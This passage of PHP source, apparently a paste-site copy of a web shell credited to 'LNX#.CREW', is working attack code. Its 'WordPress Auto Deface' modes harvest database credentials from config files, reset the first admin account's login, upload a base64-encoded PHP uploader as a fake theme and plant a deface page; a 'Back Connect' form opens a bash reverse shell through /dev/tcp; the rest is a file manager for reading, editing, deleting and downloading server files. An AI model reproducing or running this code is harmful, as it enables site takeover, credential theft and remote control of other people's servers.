  1420. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1421. $data = curl_exec($ch);
  1422. curl_close($ch);
  1423. return $data;
  1424. }
  1425. $scan = $_POST['link_config'];
  1426. $link_config = scandir($scan);
  1427. $script = htmlspecialchars($_POST['script']);
  1428. $user = "LNX";
  1429. $pass = "LNX";
  1430. $passx = md5($pass);
  1431. foreach($link_config as $dir_config) {
  1432. if(!is_file("$scan/$dir_config")) continue;
  1433. $config = file_get_contents("$scan/$dir_config");
  1434. if(preg_match("/WordPress/", $config)) {
  1435. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1436. $dbuser = ambilkata($config,"DB_USER', '","'");
  1437. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1438. $dbname = ambilkata($config,"DB_NAME', '","'");
  1439. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1440. $prefix = $dbprefix."users";
  1441. $option = $dbprefix."options";
  1442. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1443. $db = mysql_select_db($dbname);
  1444. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1445. $result = mysql_fetch_array($q);
  1446. $id = $result[ID];
  1447. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1448. $result2 = mysql_fetch_array($q2);
  1449. $target = $result2[option_value];
  1450. if($target == '') {
  1451. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1452. } else {
  1453. echo "[+] $target <br>";
  1454. }
  1455. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1456. if(!$conn OR !$db OR !$update) {
  1457. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1458. mysql_close($conn);
  1459. } else {
  1460. $site = "$target/wp-login.php";
  1461. $site2 = "$target/wp-admin/theme-install.php?upload";
  1462. $b1 = anucurl($site2);
  1463. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1464. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1465. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1466. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1467. $www = "m.php";
  1468. $fp5 = fopen($www,"w");
  1469. fputs($fp5,$upload3);
  1470. $post2 = array(
  1471. "_wpnonce" => "$anu2",
  1472. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1473. "themezip" => "@$www",
  1474. "install-theme-submit" => "Install Now",
  1475. );
  1476. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1477. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1478. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1479. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1480. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1481. curl_setopt($ch, CURLOPT_POST, 1);
  1482. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1483. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1484. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1485. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1486. $data3 = curl_exec($ch);
  1487. curl_close($ch);
  1488. $y = date("Y");
  1489. $m = date("m");
  1490. $namafile = "id.php";
  1491. $fpi = fopen($namafile,"w");
  1492. fputs($fpi,$script);
  1493. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1494. curl_setopt($ch6, CURLOPT_POST, true);
  1495. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1496. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1497. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1498. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1499. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1500. $postResult = curl_exec($ch6);
  1501. curl_close($ch6);
  1502. $as = "$target/k.php";
  1503. $bs = anucurl($as);
  1504. if(preg_match("#$script#is", $bs)) {
  1505. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1506. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1507. } else {
  1508. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1509. echo "[!!] coba aja manual: <br>";
  1510. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1511. echo "[+] username: <font color=lime>$user</font><br>";
  1512. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1513. }
  1514. mysql_close($conn);
  1515. }
  1516. }
  1517. }
  1518. } else {
  1519. echo "<center><h1>WordPress Auto Deface</h1>
  1520. <form method='post'>
  1521. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1522. <input type='text' name='script' height='10' size='50' placeholder='LNX# Crew' required><br>
  1523. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1524. </form>
  1525. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1526. </center>";
  1527. }
  1528. } elseif($_GET['do'] == 'auto_dwp2') {
  1529. if($_POST['auto_deface_wp']) {
  1530. function anucurl($sites) {
  1531. $ch = curl_init($sites);
  1532. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1533. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1534. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1535. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1536. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1537. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1538. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1539. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1540. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1541. $data = curl_exec($ch);
  1542. curl_close($ch);
  1543. return $data;
  1544. }
  1545. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1546. $post = array(
  1547. "log" => "$userr",
  1548. "pwd" => "$pass",
  1549. "rememberme" => "forever",
  1550. "wp-submit" => "$wp_submit",
  1551. "redirect_to" => "$web",
  1552. "testcookie" => "1",
  1553. );
  1554. $ch = curl_init($cek);
  1555. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1556. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1557. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1558. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1559. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1560. curl_setopt($ch, CURLOPT_POST, 1);
  1561. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1562. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1563. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1564. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1565. $data = curl_exec($ch);
  1566. curl_close($ch);
  1567. return $data;
  1568. }
  1569. $link = explode("\r\n", $_POST['link']);
  1570. $script = htmlspecialchars($_POST['script']);
  1571. $user = "LNX";
  1572. $pass = "LNX";
  1573. $passx = md5($pass);
  1574. foreach($link as $dir_config) {
  1575. $config = anucurl($dir_config);
  1576. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1577. $dbuser = ambilkata($config,"DB_USER', '","'");
  1578. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1579. $dbname = ambilkata($config,"DB_NAME', '","'");
  1580. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1581. $prefix = $dbprefix."users";
  1582. $option = $dbprefix."options";
  1583. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1584. $db = mysql_select_db($dbname);
  1585. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1586. $result = mysql_fetch_array($q);
  1587. $id = $result[ID];
  1588. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1589. $result2 = mysql_fetch_array($q2);
  1590. $target = $result2[option_value];
  1591. if($target == '') {
  1592. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1593. } else {
  1594. echo "[+] $target <br>";
  1595. }
  1596. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1597. if(!$conn OR !$db OR !$update) {
  1598. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1599. mysql_close($conn);
  1600. } else {
  1601. $site = "$target/wp-login.php";
  1602. $site2 = "$target/wp-admin/theme-install.php?upload";
  1603. $b1 = anucurl($site2);
  1604. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1605. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1606. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1607. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1608. $www = "m.php";
  1609. $fp5 = fopen($www,"w");
  1610. fputs($fp5,$upload3);
  1611. $post2 = array(
  1612. "_wpnonce" => "$anu2",
  1613. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1614. "themezip" => "@$www",
  1615. "install-theme-submit" => "Install Now",
  1616. );
  1617. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1618. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1619. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1620. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1621. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1622. curl_setopt($ch, CURLOPT_POST, 1);
  1623. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1624. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1625. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1626. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1627. $data3 = curl_exec($ch);
  1628. curl_close($ch);
  1629. $y = date("Y");
  1630. $m = date("m");
  1631. $namafile = "id.php";
  1632. $fpi = fopen($namafile,"w");
  1633. fputs($fpi,$script);
  1634. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1635. curl_setopt($ch6, CURLOPT_POST, true);
  1636. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1637. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1638. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1639. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1640. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1641. $postResult = curl_exec($ch6);
  1642. curl_close($ch6);
  1643. $as = "$target/k.php";
  1644. $bs = anucurl($as);
  1645. if(preg_match("#$script#is", $bs)) {
  1646. echo "[+] <font color='lime'>berhasil</font><br>";
  1647. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1648. } else {
  1649. echo "[-] <font color='red'>gagal</font><br>";
  1650. echo "[!!] coba aja manual: <br>";
  1651. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1652. echo "[+] username: <font color=lime>$user</font><br>";
  1653. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1654. }
  1655. mysql_close($conn);
  1656. }
  1657. }
  1658. } else {
  1659. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1660. <form method='post'>
  1661. Link Config: <br>
  1662. <textarea name='link' placeholder='http://target.com/config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1663. <input type='text' name='script' height='10' size='50' placeholder='LNX# Crew' required><br>
  1664. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1665. </form></center>";
  1666. }
  1667. } elseif($_GET['do'] == 'network') {
  1668. echo "<center><form method='post'>
  1669. Back Connect: <br>
  1670. <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
  1671. <input type='text' placeholder='port' name='port_bc' value='6969'><br>
  1672. <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
  1673. </form>";
  1674. if(isset($_POST['sub_bc'])) {
  1675. $ip = $_POST['ip_bc'];
  1676. $port = $_POST['port_bc'];
  1677. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  1678. }
  1679. echo "</center>";
  1680. } elseif($_GET['act'] == 'newfile') {
  1681. if($_POST['new_save_file']) {
  1682. $newfile = htmlspecialchars($_POST['newfile']);
  1683. $fopen = fopen($newfile, "a+");
  1684. if($fopen) {
  1685. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1686. } else {
  1687. $act = "<font color=red>permission denied</font>";
  1688. }
  1689. }
  1690. echo $act;
  1691. echo "<form method='post'>
  1692. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1693. <input type='submit' name='new_save_file' value='Submit'>
  1694. </form>";
  1695. } elseif($_GET['act'] == 'newfolder') {
  1696. if($_POST['new_save_folder']) {
  1697. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1698. if(!mkdir($new_folder)) {
  1699. $act = "<font color=red>permission denied</font>";
  1700. } else {
  1701. $act = "<script>window.location='?dir=".$dir."';</script>";
  1702. }
  1703. }
  1704. echo $act;
  1705. echo "<form method='post'>
  1706. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1707. <input type='submit' name='new_save_folder' value='Submit'>
  1708. </form>";
  1709. } elseif($_GET['act'] == 'rename_dir') {
  1710. if($_POST['dir_rename']) {
  1711. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1712. if($dir_rename) {
  1713. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1714. } else {
  1715. $act = "<font color=red>permission denied</font>";
  1716. }
  1717. echo "".$act."<br>";
  1718. }
  1719. echo "<form method='post'>
  1720. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1721. <input type='submit' name='dir_rename' value='rename'>
  1722. </form>";
  1723. } elseif($_GET['act'] == 'delete_dir') {
  1724. $delete_dir = rmdir($dir);
  1725. if($delete_dir) {
  1726. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1727. } else {
  1728. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1729. }
  1730. echo $act;
  1731. } elseif($_GET['act'] == 'view') {
  1732. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1733. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1734. } elseif($_GET['act'] == 'edit') {
  1735. if($_POST['save']) {
  1736. $save = file_put_contents($_GET['file'], $_POST['src']);
  1737. if($save) {
  1738. $act = "<font color=lime>Saved!</font>";
  1739. } else {
  1740. $act = "<font color=red>permission denied</font>";
  1741. }
  1742. echo "".$act."<br>";
  1743. }
  1744. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1745. echo "<form method='post'>
  1746. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1747. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1748. </form>";
  1749. } elseif($_GET['act'] == 'rename') {
  1750. if($_POST['do_rename']) {
  1751. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1752. if($rename) {
  1753. $act = "<script>window.location='?dir=".$dir."';</script>";
  1754. } else {
  1755. $act = "<font color=red>permission denied</font>";
  1756. }
  1757. echo "".$act."<br>";
  1758. }
  1759. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1760. echo "<form method='post'>
  1761. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1762. <input type='submit' name='do_rename' value='rename'>
  1763. </form>";
  1764. } elseif($_GET['act'] == 'delete') {
  1765. $delete = unlink($_GET['file']);
  1766. if($delete) {
  1767. $act = "<script>window.location='?dir=".$dir."';</script>";
  1768. } else {
  1769. $act = "<font color=red>permission denied</font>";
  1770. }
  1771. echo $act;
  1772. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1773. @ob_clean();
  1774. $file = $_GET['file'];
  1775. header('Content-Description: File Transfer');
  1776. header('Content-Type: application/octet-stream');
  1777. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1778. header('Expires: 0');
  1779. header('Cache-Control: must-revalidate');
  1780. header('Pragma: public');
  1781. header('Content-Length: ' . filesize($file));
  1782. readfile($file);
  1783. exit;
  1784. } else {
  1785. if(is_dir($dir) == true) {
  1786. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1787. <tr>
  1788. <th class="th_home"><center>Name</center></th>
  1789. <th class="th_home"><center>Type</center></th>
  1790. <th class="th_home"><center>Size</center></th>
  1791. <th class="th_home"><center>Last Modified</center></th>
  1792. <th class="th_home"><center>Permission</center></th>
  1793. <th class="th_home"><center>Action</center></th>
  1794. </tr>';
  1795. $scandir = scandir($dir);
  1796. foreach($scandir as $dirx) {
  1797. $dtype = filetype("$dir/$dirx");
  1798. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1799. if(!is_dir("$dir/$dirx")) continue;
  1800. if($dirx === '..') {
  1801. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1802. } elseif($dirx === '.') {
  1803. $href = "<a href='?dir=$dir'>$dirx</a>";
  1804. } else {
  1805. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1806. }
  1807. if($dirx === '.' || $dirx === '..') {
  1808. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1809. } else {
  1810. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1811. }
  1812. echo "<tr>";
  1813. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1814.  
  1815. echo "<td class='td_home'><center>$dname</center></th>";
  1816. echo "<td class='td_home'><center>$dtype</center></td>";
  1817. echo "<td class='td_home'><center>-</center></th>";
  1818. echo "<td class='td_home'><center>$dtime</center></td>";
  1819. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1820. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1821. }
  1822. echo "</tr>";
  1823. foreach($scandir as $file) {
  1824. $ftype = filetype("$dir/$file");
  1825. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1826. $size = filesize("$dir/$file")/1024;
  1827. $size = round($size,3);
  1828. if($size > 1024) {
  1829. $size = round($size/1024,2). 'MB';
  1830. } else {
  1831. $size = $size. 'KB';
  1832. }
  1833. if(!is_file("$dir/$file")) continue;
  1834. echo "<tr>";
  1835. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1836. echo "<td class='td_home'><center>$ftype</center></td>";
  1837. echo "<td class='td_home'><center>$size</center></td>";
  1838. echo "<td class='td_home'><center>$ftime</center></td>";
  1839. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1840. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1841. }
  1842. echo "</tr></table><hr>";
  1843. } else {
  1844. echo "<font color=red>can't open directory</font>";
  1845. }
  1846. echo "<br><center>[ COPYRIGHT BY<font color=silver> LNX#.CREW ]</font></a></center><br>";
  1847. }
  1848. ?>
  1849. </html>
Add Comment
Please, Sign In to add comment